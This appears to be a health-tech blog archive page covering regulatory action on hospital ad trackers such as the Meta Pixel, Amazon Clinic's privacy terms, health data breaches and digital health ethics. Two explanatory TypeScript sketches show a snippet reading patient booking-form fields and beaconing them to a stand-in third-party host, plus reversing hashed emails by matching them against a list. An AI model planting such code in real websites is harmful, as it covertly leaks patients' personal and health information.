FTC, HHS OCR tighten scrutiny of third-party ad trackers, send letter to 130 hospitals and telehealth providers

If you’ve checked on your legal department, they may resemble Pepper (left). Hospitals and telehealth companies have been put on notice by letter agencies HHS Office for Civil Rights (OCR) and the Federal Trade Commission (FTC) that transmitting personal health information–not just the protected health information (PHI) covered by HIPAA–to third parties via ad trackers like the Meta Pixel is now forbidden, verboten, not permitted. In the joint statement by OCR and FTC, hospitals, providers, and telehealth companies were explicitly told that use of these online trackers is being equated with violations of consumer privacy. Their release specified “sensitive information” such as health conditions, diagnoses, medications, medical treatments, frequency of visits to health care professionals, and where an individual seeks medical treatment. Hospitals and telehealth companies also cannot plead ignorance of what their developers did, as the responsibility is being put squarely on them to monitor the data flowing from their websites and apps to third parties. 

“The FTC is again serving notice that companies need to exercise extreme caution when using online tracking technologies and that we will continue doing everything in our powers to protect consumers’ health information from potential misuse and exploitation,” said Samuel Levine, Director of the FTC’s Bureau of Consumer Protection. At OCR, which historically had its hands full with HIPAA violations and data breaches, the scope has broadened. “Although online tracking technologies can be used for beneficial purposes, patients and others should not have to sacrifice the privacy of their health information when using a hospital’s website,” said Melanie Fontes Rainer, OCR Director. “OCR continues to be concerned about impermissible disclosures of health information to third parties and will use all of its resources to address this issue.” Both HHS and FTC can take action without the time-consuming legal proceedings that DOJ must undertake.

True to FTC’s renewed use of the 2009 Health Breach Notification Rule, the letter sent to 130 hospital systems and telehealth providers came down hard on anything that could be interpreted as personal health information. Even for health organizations not covered by HIPAA, the letter is explicit on their obligation to protect this information from disclosure and to monitor the flow to third parties even if it is not used for marketing. Without explicit consumer authorization, such disclosure can “violate the FTC Act as well as constitute a breach of security under the FTC’s Health Breach Notification Rule.” Previous TTA coverage on third-party trackers and FTC actions here. Health IT Security

The DOJ and FTC alone, with actions on ad trackers and changes to antitrust guidelines, have made the spring and summer of 2023 a most interesting and busy one for hospital and healthcare company legal departments. It’s even more amazing that, given this background and being on notice, Amazon just keeps flouting basic regulations about health information usage, such as for Amazon Clinic–which to date has not rolled out nationally. TTA 27 June

Amazon Clinic delays 50-state telehealth rollout due to Federal data privacy, HIPAA concerns on user registration, PHI–is it a warning?

Amazon is delaying Amazon Clinic’s national rollout from today (27 June) to 19 July. Amazon Clinic, which debuted last November as an asynchronous, message-based telehealth consult or prescription renewal referral platform [TTA 16 Nov 2022], has once again run into Federal scrutiny. This time, it’s two Senators from New England–the well-known Elizabeth Warren (D-MA) and the little-known Peter Welch (D-VT)–who are poking Amazon with the stick of whether sensitive health and personal data are flowing into Amazon’s other databases.

Their letter to CEO Andy Jassy was fair warning that, as this Editor predicted last February (see the list of open issues) after the One Medical buy closed to high-fives all around, the government is nowhere near finished with scrutinizing Amazon and how personal data, including health data, flows between its units and is monetized. 

In a two-page letter dated 16 June, based on reporting in the Washington Post (100% owned by Amazon’s 12.6% shareholder and controller, Jeff Bezos–the irony runs deep here), the two senators make clear they believe they have caught Amazon but good–and with some of the goods. 

  • Users of the Amazon Clinic service are asked, in the registration form, to authorize the “use and disclosure of protected health information.” They are told that agreement to this gives Amazon access to the “complete patient file” and that this information “may be re-disclosed,” after which it will “no longer be protected by HIPAA”. By agreeing to this, users waive any HIPAA personal health information protections.
  • If the user declines to agree, they are redirected away, unable to complete Amazon Clinic registration, and denied care. HIPAA regulations specifically prohibit conditioning care on agreement to disclose patient information. (This is known by anyone who has taken required training or certification on HIPAA when working for health plans or other regulated healthcare providers, including RPM and telehealth vendors.)

The letter raises the sensible, usual questions on why personal data is being collected and what Amazon is doing with it. For instance, it requests responses on how patient data is used by Amazon, what data is shared with third-party entities, and what data is used in any analytics or algorithms. It cites as a non-compliance example the $1.5 million FTC penalty GoodRx paid for its past Meta Pixel usage for ad tracking. (Interestingly avoiding the $7.8 million Teladoc’s BetterHelp paid for similar ad tracker misuse.)

The $30/visit service has been available in 33 states since last year and currently, through asynchronous messaging, provides care for minor conditions such as UTIs, herpes, and skin infections. The expansion will cover all 50 states and add synchronous video telehealth.

One would think that with billions on the line with One Medical, Amazon would be more cautious about poking the Antitrust Bear. They have already been put on notice by the Federal Trade Commission, the Department of Justice (DOJ), Congress, and multiple states. For Amazon Clinic, requiring individuals to waive their right to protect their PHI in registering for the service is downright brazen. How this got past their legal and compliance departments boggles the mind. Why Amazon is not ‘hiving off’ PHI collected through this small service is another question. Doing so would show the FTC and DOJ that Amazon can play by the rules. Instead, it confirms the widely held belief of those in healthcare that Amazon culturally cannot deal with the restrictions that come with the territory. Are they deliberately ‘playing chicken’ with the Feds? Pollo loco? This up-to-the-line behavior tends not to end well, as the telemental health providers that over-prescribed controlled substances found out.  POLITICO, The Hill, mHealth Intelligence

FTC takes off the gloves, v2: a walk on the technical side of ad pixel tracking

FTC explains its actions versus GoodRx and Teladoc’s BetterHelp. If ad trackers leave you a little “pixelated”, this FTC blog (who would have thunk?) is a decent explanation of what ad trackers, a/k/a third-party tracking pixels, do. They’re not evil, as some of the FTC statements would have you think, and have legitimate uses in tracking how your website pages are being used (and by whom). But GoodRx and BetterHelp in particular went too far in information gathering, sloppy handling, and monetizing customer information with third parties. 

  • Pixels, once tiny images, are now extensive bits of JavaScript or HTML code that send information from the page they’re on back to whoever supplied the code–for third-party pixels, an ad platform such as Meta. Consumers are of course totally unaware of their use.
  • These codes can send back basic, non-identifiable, and useful information to marketers, such as pageviews, clicks, and interactions with ads or with their pages.
  • Unfortunately, code can be written to send far more detailed information back to marketers, such as names, answers to questionnaires, email addresses, financial information, and more. Some of this can be hashed (a form of masking), but hashes of known values can be matched back to the originals (see the sketch after this list). This is potentially sensitive information that needs to be handled carefully and with the assumption of confidentiality. 
  • As mentioned in our TTA articles, this information can be monetized by companies and provide an additional revenue stream. This type of information has value to ad networks (Apple, Microsoft, Google, Meta, etc.), data brokers, social networks (Facebook, TikTok), advertisers, and others. 
  • Neither site asked users’ permission to retain this information or to use it for third-party ad targeting.
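
To make those mechanics concrete, below is a minimal, hypothetical sketch (in Node-flavored TypeScript) of what a third-party tracking snippet can assemble and transmit, and why a hashed email is weak protection. The endpoint (collector.example.com), the function names, and the sample data are this Editor’s illustrative assumptions, not Meta’s actual Pixel code.

```typescript
// Hypothetical sketch of what a third-party tracking snippet can capture and send.
// The endpoint and function names are illustrative, not the actual Meta Pixel API.
import { createHash } from "crypto";

interface TrackedEvent {
  page: string;
  buttonText: string;   // e.g. "Schedule appointment"
  hashedEmail: string;  // "hashed" is not the same as anonymous
}

function sha256(value: string): string {
  return createHash("sha256").update(value.trim().toLowerCase()).digest("hex");
}

// What a snippet embedded on a page could assemble from the page and its form fields.
function buildEvent(page: string, buttonText: string, email: string): TrackedEvent {
  return { page, buttonText, hashedEmail: sha256(email) };
}

// Sending it to a third-party collector is a single HTTP request.
async function sendToAdNetwork(event: TrackedEvent): Promise<void> {
  await fetch("https://collector.example.com/events", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(event),
  });
}

// Why hashing is weak masking: a list of known emails can be hashed and matched back.
function reverseHash(target: string, knownEmails: string[]): string | undefined {
  return knownEmails.find((email) => sha256(email) === target);
}

const event = buildEvent("/find-a-doctor", "Book cardiology visit", "jane.doe@example.com");
console.log(reverseHash(event.hashedEmail, ["other@example.com", "jane.doe@example.com"]));
// -> "jane.doe@example.com"
```

The last function is the FTC’s point in miniature: a ‘hashed’ identifier matched against a list of known values is, for practical purposes, still an identifier.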

The FTC blog then goes on to discuss its concerns and where the FTC will dig even deeper, into areas such as consumer harm and how companies manage the data. You don’t have to be a HIPAA-covered entity to fall under FTC’s purview–just capture consumer health data and then share it with third parties or make deceptive representations.

Digital health companies are on notice to be concerned about yet another Federal three-letter agency. Expect more actions by FTC beyond GoodRx (getting off lightly at $1.5 million) and BetterHelp (dinged for $7.8 million which will somehow be returned to consumers). 

More gimlety views on CVS-Oak Street Health, Amazon-One Medical acquisitions

Perhaps this Editor is not that much of an Outlier in thinking that these deals don’t beat, say, sliced bread. Oak Street Health (OSH) disclosed its financials in an SEC 10-K filed on Tuesday. One must wonder what CVS is seeing in the company other than bulking up its primary care profile. Its loss grew to $510 million from 2021’s $415 million. While OSH grew impressively in 2022 with a 51% increase in revenue to $2.2 billion, driven by 40 new centers for a total of 169 facilities in 21 states, expenses for the new patients grew nearly as fast: medical claims expenses grew 48%, cost of care went up 49%, and sales and marketing up 38%. Scalable, so they claim; profitable, not till 2025 at earliest.

Other problems were revealed in the 10-K. OSH has substantial business from other payers, which may not be pleased that CVS owns a small payer called Aetna, though CVS has pledged to keep OSH payer-neutral. OSH leases or licenses most of its care centers from Humana. That payer also accounted for 32% of its 2022 capitated revenue. Centene’s plans and HealthSpring made up an additional 23%. Other, more routine concerns are regulatory review, attrition of physicians and clinician staff, and last but not least, breakup fees ($500 million if CVS walks away, $300 million if it’s OSH). When you add these to other factors outlined in our earlier article, such as the concentration in Medicare Advantage and high-need populations, CVS is cutting off a hefty slice of loaf, especially considering that the more complex Signify Health buy is due to close this quarter. Earlier opinions on the buy [TTA 16 Feb], Healthcare Dive

Now to Amazon and One Medical. This Editor received her invitation to buy a One Medical membership earlier this week (left). Healthcare Dive counters this Editor’s analysis from last week–which maintains that Amazon is already under a broad antitrust microscope at the Federal Trade Commission (FTC) and the Department of Justice (DOJ)–arguing, quite logically and in the view of its experts, that if either agency were going to object, it would have done so before the closing, and that the grounds were likely too novel. The article concedes that the FTC could take action further down the road, for instance if Amazon violates HIPAA or consumer privacy with ad trackers. Instead, the focus is on objections by consumer groups, Amazon leveraging health data, privacy violations, and a general consumer unease around Amazon dealing with their health issues.

  • Consumer protection group Public Citizen urged regulators to block the deal in a letter sent after it was announced last summer. For instance, Amazon could bundle One Medical and Prime membership (a no-brainer). By tying the two together, Amazon could gain consent for using patient data from health records. Amazon could also serve ads for products related to medical conditions without that access (that old Pixel/ad tracker business again). These concerns are publicly shared by two FTC commissioners.
  • Analysts said that data acquisition was likely a big driving factor for the deal. “After linking One Medical’s data with that from its other products and services, Amazon can analyze petabytes of healthcare data in the cloud and use the findings to better manage the health of One Medical’s Medicare population, build new products and pinpoint people with rare diseases to solicit participation in clinical trials, according to (market research firm) Forrester’s (Natalie) Schibell.” [Editor] That would, of course, require patient consent. 
  • Forrester noted that the consumer unease around Amazon in healthcare is substantial: 34% of surveyed adults weren’t at all comfortable with Amazon for healthcare needs, with an additional 17% only somewhat comfortable (tier 2). Trust is low, and it would take only one or two incidents, such as a security breach or HIPAA violation, to destroy it. This Editor would add that if One Medical practices were not managed impeccably, that would go viral among individual and corporate members, in a way that Amazon Care did not.

Let the lawsuits begin: Meta sued by health system patient for Meta Pixel info gathering

That was fast. Class action game on! The class action lawsuit filed against Meta on Friday in the US District Court for the Northern District of California in San Francisco, reported today, is likely to be only the first. The ‘John Doe’ plaintiff, a patient of Baltimore-based Medstar Health System and a Facebook user, claims that he is filing on behalf of “millions of other Americans whose medical privacy has been violated by Facebook’s Pixel tracking tool.” Four law firms are involved in the lawsuit. It follows on last week’s investigative report by The Markup and STAT on the Meta Pixel tracker being used by 33 of the top 100 hospital systems [TTA 17 June].

The study indicates that the information gathered in the appointment booking form included IP address, doctor’s name, patient name, email address, phone number, zip code, and city of residence. When combined with outside information, that data can constitute protected health information, and its disclosure can be considered a HIPAA violation.

The lawsuit alleges that the information was collected without consent. Meta/Facebook has no Business Associate Agreement (BAA) in place covering the gathering of this information with any of the 664 health systems using the Meta Pixel cited in the suit.

The suit requests compensatory and punitive damages for breach of contract, constitutional invasion of privacy, violation of the Electronic Communications Privacy Act, violation of the California Invasion of Privacy Act, and other allegations. The filing was captured by ReclaimTheNet.org. If you look at page 18, there are multiple statements from Meta/Facebook that advertising based on health is ‘inappropriate’, followed by illustrations of how Facebook goes ahead and does it anyway (!)

A small wrinkle: In a statement to HIPAA Journal, Medstar Health claimed it does not use the Meta Pixel or any Facebook code on its website, which creates an issue with the plaintiff’s standing and claimed harm.

FierceHealthcare, Becker’s, HealthITSecurity

Breaking: Hospitals sending sensitive patient information to Facebook through website ‘Meta Pixel’ ad tracker–study

Meta Pixel tracker sending appointment scheduling, patient portal information to Facebook–likely to become the Hot Story of next week. A study published jointly by The Markup and STAT examined the patient-facing areas of the websites of Newsweek’s 100 leading hospitals. It found that 33 of them permit the Meta Pixel ad tracker to send sensitive patient information back to Facebook. Ostensibly the reason is to better serve the patient with more tailored information, but what is not disclosed is what else Facebook is doing with the information. At a minimum, the information sent is the IP address–which HIPAA considers one of 18 identifiers that, when linked to other personal information, can constitute protected health information.

Ad trackers like the Meta Pixel are used to target website visitors and also to track ads placed on Facebook and Instagram. Developers routinely add these snippets of code to measure performance and track how a website is used.

  • For 33 hospitals, the Pixel tracker is picking up and sending back to Facebook information from users of the hospital’s online appointment scheduler: the user’s IP address, the text of the button clicked, the doctor’s name, and the search term. In testing the sites using a team approach facilitated by a plug-in called Mozilla Rally, the testers found that in several cases, even more identifiable patient information was being sent: first name, last name, email address, phone number, zip code, and city of residence entered into the booking form (see the sketch after this list for how a tracker can read a form).
  • Seven hospitals have the Pixel embedded in another highly sensitive area–the password-protected patient portal. These go by various names, but a popular one is Epic’s MyChart. One surveyor found that for Piedmont Healthcare, the Pixel picked up the patient’s name, the name of their doctor, and the time of their upcoming appointment. For Novant Health, the information was even more detailed: the name and dosage of a medication in the health record, notes entered about allergic reactions to the prescription, and the button clicked in response to a question about sexual orientation. (Novant has since removed the Pixel.)
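
For readers who want to see how little code this takes, here is a minimal, hypothetical browser-side sketch of the general technique: reading a booking form’s fields and button label before submission and beaconing them to a third party. The form selector, field names, and endpoint are this Editor’s illustrative assumptions, not the Meta Pixel’s actual code.

```typescript
// Hypothetical sketch of a tracker reading an appointment-booking form in the browser.
// Selectors, field names, and the collector endpoint are illustrative only.
function captureBookingForm(form: HTMLFormElement): Record<string, string> {
  const data: Record<string, string> = {};
  for (const field of ["first_name", "last_name", "email", "phone", "zip", "city"]) {
    const input = form.querySelector<HTMLInputElement>(`[name="${field}"]`);
    if (input?.value) data[field] = input.value;
  }
  // The submit button's label ("Schedule appointment with Dr. Smith") is also readable.
  const button = form.querySelector<HTMLButtonElement>("button[type=submit]");
  if (button) data.button_text = button.textContent?.trim() ?? "";
  return data;
}

document.querySelector<HTMLFormElement>("#appointment-form")?.addEventListener("submit", (event) => {
  const payload = captureBookingForm(event.target as HTMLFormElement);
  // sendBeacon fires reliably even as the page navigates away after submission.
  navigator.sendBeacon("https://tracker.example.com/collect", JSON.stringify(payload));
});
```

Nothing here requires breaking into anything; the snippet simply runs with the same access to the page as the hospital’s own code, which is why the consent and BAA questions below matter.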

None of the hospitals using the Pixel have patient consent forms permitting the transmission of individual patient information, nor business associate agreements (BAAs) that permit this data’s collection.

The reaction of most of these hospitals was interesting. Some immediately removed the Pixel without comment. Others maintained that no protected information was sent via the Pixel or otherwise defended its use. Houston Methodist was almost alone in providing a detailed response on how they used it, but subsequently removed it.

Facebook maintains that it does not use this information in any identifiable way and that since 2020 it has had in place a sensitive health data filtering system and other safeguards. The New York Department of Financial Services, in a separate action monitoring Facebook in this area, questioned the accuracy of the filtering system. Even when the information is ‘encrypted’ (in practice, hashed), it is easy to reverse. Internal leaked Facebook documents indicate that engineers on the ad and business product team admitted as late as 2021 that they don’t have “an adequate level of control and explainability over how our systems use data, and thus we can’t confidently make controlled policy changes or external commitments such as ‘we will not use X data for Y purpose.’” (quoted from Vice)

The study could not determine whether Facebook used the data to target advertisements, train its recommendation algorithms, or profit in other ways, but the collection alone can be in violation of US regulations. 

On the face of it, it violates patient privacy. But is it a HIPAA violation of protected health information? No expert quoted was willing to say definitively that it is, but a University of Michigan law professor who studies big data and health care said “I think this is creepy, problematic, and potentially illegal” from the hospitals’ point of view. Some of the hospitals, in their comments, say that they vetted it. One wonders at this tradeoff.

To this Editor, Meta Pixel’s use in this way walks right up to the line and puts a few toes over.

If this is true of 33 major hospitals, what about the rest of them–smaller and less important than Columbia Presbyterian, Duke, Novant, and UCLA? What all of us have suspected is quite true–social media is collecting data on us and invading our privacy at every turn, and except for exposés like this, 99% of people neither know nor care that their private information is being used.

The Markup is continuing their “Pixel Hunt” series with children’s hospitals. A previous article is about Pixels tracking information from crisis pregnancy centers, about as sensitive as you can get. Also HISTalk.

Google’s Care Studio patient record search tool to pilot at Beth Israel Deaconess Medical Center

A cleaned-up Project Nightingale? Beth Israel Deaconess Medical Center (BIDMC) in Boston announced their participation in a pilot with Google of Care Studio, described in the BIDMC press release as “a technology designed to offer clinicians a longitudinal view of patient records and the ability to quickly search through those records through a single secure tool.” In other words, it’s like Google Search going across multiple systems: the BIDMC proprietary EHR (WebOMR), the core medical record system, and several clinical systems designed for specific specialties. All the clinician need do is type a term, and the system will surface relevant information from their patient’s medical record across these systems, saving time and promoting accuracy. (See left)
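
As pure illustration of the pattern the release describes–one search term fanned out across several record systems, with results merged for the clinician–here is a minimal TypeScript sketch. The interfaces and names are this Editor’s assumptions, not Google’s Care Studio code.

```typescript
// Minimal sketch of a federated "search across record systems" pattern.
// RecordSource, RecordHit, and searchPatientRecord are hypothetical names.
interface RecordHit {
  system: string;   // e.g. "WebOMR", "lab results", "cardiology"
  snippet: string;  // the matching fragment shown to the clinician
  date: string;     // ISO date, used for newest-first ordering
}

interface RecordSource {
  name: string;
  search(patientId: string, term: string): Promise<RecordHit[]>;
}

async function searchPatientRecord(
  sources: RecordSource[],
  patientId: string,
  term: string,
): Promise<RecordHit[]> {
  // Query every source concurrently, then merge and sort newest-first.
  const perSource = await Promise.all(sources.map((s) => s.search(patientId, term)));
  return perSource.flat().sort((a, b) => b.date.localeCompare(a.date));
}
```

The hard parts in a real clinical deployment–mapping terminologies across systems, access control, and audit logging–are exactly what the BAA and privacy language below are meant to cover.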

The BIDMC pilot will use a limited group of 50 inpatient physicians and nurses to assess the quality, efficacy, and safety of the tool’s use. Technical work starts this month.

At the end of the BIDMC release, it’s carefully explained that the tool is “designed to adhere to state and federal patient privacy regulations, including the Health Insurance Portability and Accountability Act of 1996 (HIPAA) and industry-wide standards related to protected health information. BIDMC and Google Health have entered into a Business Associate Agreement (BAA) to ensure that both parties meet patient privacy obligations required under HIPAA. BIDMC patient data will be stored and maintained in a protected environment, isolated from other Google customers.” (Editor’s emphasis) The BAA was inked in 2018.

Without referring to it directly, this addresses the controversy surrounding Google’s Project Nightingale and Ascension Health, a major privacy kerfuffle pre-COVID that broke in early November 2019. From the TTA article, edited: “Google’s BAA apparently allowed them to access in the initial phase at least 10 million identified health records which were transmitted to Google without patient or physician consent or knowledge, including patient names, lab results, diagnoses, hospital records, and dates of birth.” Ascension maintained that everything was secure and Google could not use data for marketing or other purposes not connected to the project, but handling was under wraps and Google employees had access to the data. Ascension’s core agreement was about migration of data to Google Cloud and providing G Suite tools to clinicians and employees. But apparently there was also a search tool component, which evolved into Care Studio.

Health and Human Services’ (HHS) Office for Civil Rights, which governs privacy, announced an investigation at the time. The only later reference this Editor was able to locate was in HIPAA Journal of 5 March 2020 regarding the request of three Senators from both sides of the aisle demanding an explanation of the agreements and what information Google employees accessed. The timing was bad, as COVID then hit and all else went out the window. In short, the investigations went nowhere, at least publicly.

It would surprise this Editor if any questions were raised about Care Studio, though BIDMC’s goal is understandable and admirable. Also Becker’s Hospital Review, FierceHealthcare

Will the rise of technology mean the fall of privacy–and what can be done? UK seeks a new National Data Guardian.

Can we have data sharing and interoperability while retaining control by individuals on what they want shared? This keeps surfacing as a concern in the US, UK, Europe, and Australia, especially with COVID testing.

In recent news, last week’s acquisition of Ancestry by Blackstone [TTA 13 August] raised questions in minds other than this Editor’s of how a business model based on the value of genomic data to others is going to serve two masters–investors, and customers who simply want to know their genetic profile and disease predispositions and may be unclear or confused about how to limit where their data goes, however de-identified. The consolidation of digital health companies, practices, and payers–Teladoc and Livongo, CVS Health and Aetna, and even Village MD and Walgreens–is also dependent on data. Terms you hear are ‘tracking the patient journey’, ‘improving population health’, and a Big ’80s term, ‘synergy’. This does not include all the platforms that are solely about the data and making it more available in the healthcare universe.

A recent HIMSS virtual session, reported in Healthcare Finance, addressed the issue in a soft and jargony way which is easy to dismiss. From one of the five panelists:  

Dr. Alex Cahana, chief medical officer at ConsenSys Health: “And so if we are in essence our data, then any third party that takes that data – with a partial or even complete agreement of consent from my end, and uses it, abuses it or loses it – takes actually a piece of me as a human.”

Dignity-Preserving Technology: Addressing Global Health Disparities in Vulnerable Populations

But then when you dig into it and the further comments, it’s absolutely true. Most data sharing, most of the time, is helpful. Not having to keep track of everything on paper, being able to store your data digitally, or your primary care practice or radiologist having it and its interpretation accessible, makes life easier. The average person tends to block out the possibility of misuse, except when it turns around and bites them. So what is the solution? Quite a bit of this discussion was about improving “literacy”, which is a Catch-22 of vulnerability–‘lacking skill and ability’ to understand how their data is being used versus ‘the system’ actually creating these vulnerable populations. But when the priority, from the government on down to private payers, is ‘value-based care’ and saving money, how does this prevent the ‘nefarious use’ of shared data, or the re-identification of de-identified data, for which you, the vulnerable, have given consent? 

It’s exhausting. Why not avoid the problem in the first place? Having observed the uses and misuses of genomics data, this Editor will harp on again that we should have a Genomic Data Bill of Rights [TTA 29 Aug 18] that gives consumers full transparency on where their data is going and how it is being used, and lets them easily keep their data private without jumping through a ridiculous number of hoops. This could be expandable to all health data. While I’d prefer this to be enforced by private entities, I don’t see it having a chance. In the US, we have HIPAA, which is enforced by HHS’ Office for Civil Rights (OCR), which also watchdogs and fines for internal data breaches. Data privacy is also a problem of international scope, what with data hacking coming from state-sponsored entities in China and North Korea, as well as Eastern European pirates.

Thus it is encouraging that the UK’s Department of Health and Social Care is seeking a new national data guardian (NDG) to figure out how to safeguard patient data, based on the December 2018 Act. This replaces Dame Fiona Caldicott, who was the first NDG starting in 2014, well before the Act. The specs for the job in Public Appointments are here. You’ll be paid £45,000 per annum for a 2-3 day week, primarily working remotely with some travel to Leeds and London. (But if you’d like it, apply quickly–it closes 3 Sept!) It’s not full time, which is slightly dismaying given the situation’s growing importance. The HealthcareITNews article has a HIMSS interview video with Dame Fiona discussing the role of trust in this process, starting with the clinician, and why the Care.data program was scrapped. Of related interest is Public Health England’s inter-mortem of lessons learned in data management from COVID-19, while reportedly Secretary Matt Hancock is replacing it with a new agency with a sole focus on health protection from pandemics. Hmmmmm…..HealthcareITNews.

About time: digital health grows a set of ethical guidelines

Is there a sense of embarrassment in the background? Fortune reports that the Stanford University Libraries are taking the lead in organizing an academic/industry group to establish ethical guidelines to govern digital health. These grew out of two meetings in July and November last year with the participation of over 30 representatives from health care, pharmaceutical, and nonprofit organizations. Proteus Digital Health, the developer of a formerly creepy sensor pill system, is prominently mentioned, but attending were representatives of Aetna CVS, Otsuka Pharmaceuticals (which works with Proteus), Kaiser Permanente, Intermountain Health, Tencent, and HSBC Holdings.

Here are the 10 Guiding Principles, which concentrate on data governance and sharing, as well as the use of the products themselves. They are expanded upon in this summary PDF:

  1. The products of digital health companies should always work in patients’ interests.
  2. Sharing digital health information should always be to improve a patient’s outcomes and those of others.
  3. “Do no harm” should apply to the use and sharing of all digital health information.
  4. Patients should never be forced to use digital health products against their wishes.
  5. Patients should be able to decide whether their information is shared, and to know how a digital health company uses information to generate revenues.
  6. Digital health information should be accurate.
  7. Digital health information should be protected with strong security tools.
  8. Security violations should be reported promptly along with what is being done to fix them.
  9. Digital health products should allow patients to be more connected to their care givers.
  10. Patients should be actively engaged in the community that is shaping digital health products.

We’ve already observed that best practices in design are putting some of these principles into action. Your Editors have long advocated, to the point of tiresomeness, that data security is not notional, from the smallest device to the largest health system. Our photo at left may be vintage, but if anything the threat has both grown and expanded. 2018’s ten largest breaches affected almost 7 million US patients and disrupted their organizations’ operations. Social media is also vulnerable. Parts of the US government–Congress and the FTC through a complaint filing–are also coming down hard on Facebook for sharing personal health information with advertisers. This is PHI belonging to members of closed Facebook groups meant to support those with health and mental health conditions. (HIPAA Journal).

But here is where Stanford and the conference participants get all mushy. From their press release:

“We want this first set of ten statements to spur conversations in board rooms, classrooms and community centers around the country and ultimately be refined and adopted widely.” –Michael A. Keller, Stanford’s university librarian and vice provost for teaching and learning

So everyone gets to feel good and take home a trophy? Nowhere are there next steps, corporate statements of adoption, and so on.

Let’s keep in mind that Stanford University was the nexus of the Fraud That Was Theranos, which is discreetly not mentioned. If not a shadow hovering in the background, it should be. Perhaps there is some mea culpa, mea maxima culpa here, but this Editor will wait for more concrete signs of Action.

Babylon Health’s ‘GP at hand’ not at hand for NHS England–yet. When will technology be? Is Carillion’s collapse a spanner in the works?

NHS England won’t be rolling out the Babylon Health ‘GP at hand’ service anytime soon, despite some success in its London test with five GP practices [TTA 12 Jan]. Digital Health cites an October study by Hammersmith and Fulham CCG (Fulham being one of the test practices) that to this Editor expresses both excitement at an innovative approach and concern over the same easy-to-see drawback:

The GP at Hand service model represents an innovative approach to general practice that poses a number of challenges to existing NHS policy and legislation. The approach to patient registration – where a potentially large volume of patients are encouraged to register at a physical site that could be a significant distance from both their home and work address, arguably represents a distortion of the original intentions of the Choice of GP policy. (Page 12)

There are also concerns about patients with complex and other special needs (inequality of service), controlled drug policy, and the capacity of Babylon Health to expand the service. Since the October report, a Babylon spokesperson told Digital Health that “Commissioners have comprehensively signed off our roll-out plan and we look forward to working with them to expand GP at Hand across the country.” 

Re capitation, why ‘GP at hand’ use is tied to a mandatory change of GP practices has left this Editor puzzled. In the US, telemedicine visits, especially the ‘I’ve got the flu and can’t move’ type or those to specialists (dermatology), are often (not always) separate from whoever your primary care physician is. Yes, centralizing the records winds up being mostly in the hands of US patients unless the PCP is copied or it is part of a payer/corporate health program, but this may be the only way that virtual visits can be rolled out in any volume. In the UK, is there a workaround where the patient’s electronic record can be accessed by a separate telemedicine doctor?

Another tech head-shaker: 45 percent of GPs want technology-enabled remote working. 48 percent said that flexible working and working from home would enable doctors to provide more personalized care. Allowing remote working to support out-of-hours care could not only free up time for thousands of patient appointments but also level out doctor capacity disparities between regions. The survey here of 100 GPs was conducted by a cloud-communications provider, Sesui. Digital Health. This is a special need that isn’t present in the US except in closed systems like the VA, which is finally addressing the problem. The wide use of clinical connectivity apps enables US doctors to split time between hospital and multiple practices–so much so, and on so many devices, that app security is a concern. 

Another head-shaker: 48 percent of missed NHS hospital appointments are due to letter-related problems, such as the letter arriving too late (17 percent), not being received (17 percent) or being lost (8 percent). 68 percent of patients prefer to manage their appointments online or via smartphone. This preference has real financial impact, as the NHS estimates that 8 million appointments were missed in 2016-2017, at a cost of £1bn. Now, this survey of 2,000 adults was sponsored by Healthcare Communications, a provider of patient communications technology to 100 NHS trusts, so there’s a dog in the hunt. However, they developed for Barnsley Hospital NHS Foundation Trust a digital letter technology that is claimed to reduce outpatient postal letters by 40 percent. Considering my dentist sends me three emails plus separate text messages before my twice-yearly exam…. Release (PDF).

Roy Lilley’s daily newsletter today also engages the Tech Question and the “IT desert” present in much of the daily life of the NHS. Trusts are addressing it, junior doctors are WhatsApping, and generally, clinicians are hot-wiring the system in order to get anything done. It is much like the US about five to seven years ago, when HHS had huge HIPAA concerns (more…)

16 or 27 million 2016 breaches, 1 in 4 Americans? Data, IoT insecurity runs wild (US/UK)

What’s better than a chilly early spring dive into the North Sea of Health Data Insecurity?

Accenture’s report released in February calculated that 26 percent of Americans had experienced a health care-related data breach. 50 percent of those were victims of medical identity theft and had to pay an average of $2,500 in additional costs. Over one-third (36 percent) believed the breach took place in hospitals, followed by urgent care and pharmacies (both 22 percent). How did they find out? Credit card and insurer statements were the usual routes, with only one-third being notified by their provider. Interestingly, a scant 12 percent of data breach victims reported the breach to the organization holding their data. (You’d think they’d be screaming?) The samples were taken between November 2016 and January 2017. Accenture has similar surveys for the UK, Australia, Singapore, Brazil, Norway, and Saudi Arabia. Release  PDF of the US Digital Trust Report

So what’s 16 million breaches between friends? Or 4 million? Or 27 million?

  • That is the number (well, 15.9 million and change) of healthcare/medical records breached in 2016 in 376 breaches reported by the Identity Theft Resource Center (ITRC), a Federally/privately supported non-profit. Healthcare, no surprise, is far in the lead, with 34 percent of breaches and 44 percent of records, respectively. The 272 pages of the 2016 End of Year Report will take more than a casual read, but much of its data is outside of healthcare.
  • For a cross-reference, we look to the non-profit Privacy Rights Clearinghouse which for many years has been a go-to resource for researchers. PRC’s 2016 numbers are lower, substantially so in the number of records: 301 breaches and 4 million records.
  • HIMSS and Healthcare IT News insist that ransomware is under-reported, (more…)

Summertime, and the health data breaches are easy….

Cybersecurity is the word, not the bird, from South Korea (see here) to the US. The week opened with an unusual healthcare plan supplier breach: 3.3 million payer records held by a card issuer, Newkirk Products of Albany, NY. The company issues ID cards for several Blue Cross and Blue Shield plans and provides management services to other commercial payers. Ironically, it was discovered five days after its $410 million acquisition by Broadridge Financial Solutions of Lake Success, Long Island. On July 6, Newkirk discovered ‘unauthorized access’ to a server with records containing the member’s name, mailing address, type of plan, member and group ID number, names of dependents enrolled in the plan, primary care provider, and in some cases, date of birth, premium invoice information and Medicaid ID number. “No health plans’ systems were accessed or affected in any way” according to the release. MedCityNews, Newkirk release on notice

Another breach affected an estimated 3.7 million patients at Arizona’s Banner Health. This one was a bit closer to home: hackers compromised computer systems used to process debit and credit card payments at its food and beverage outlets in four states between June 23 and July 7. A week later, the hackers gained unauthorized access to systems containing patient information, health plan member and beneficiary information, as well as information about physicians and healthcare providers. MedCityNews, Banner Health release

But what’s secret anymore about your health data anyway? It’s all those apps that are sending data via your Apple Watch and your Fitbit which aren’t necessarily covered by HIPAA or secure. (more…)

90% of industries have had PHI data breach: Verizon (HIMSS Connected Health)

Reporting from the HIMSS Connected Health Conference (CHC)

Cybersecurity is one of the three central themes of this year’s HIMSS CHC, making it excellent timing for releasing the highlights of Verizon’s first-ever PHI (Protected Health Information) Data Breach Report. This is a spinoff of its extensive, eight-years-running international Data Breach Investigations Report (DBIR). 

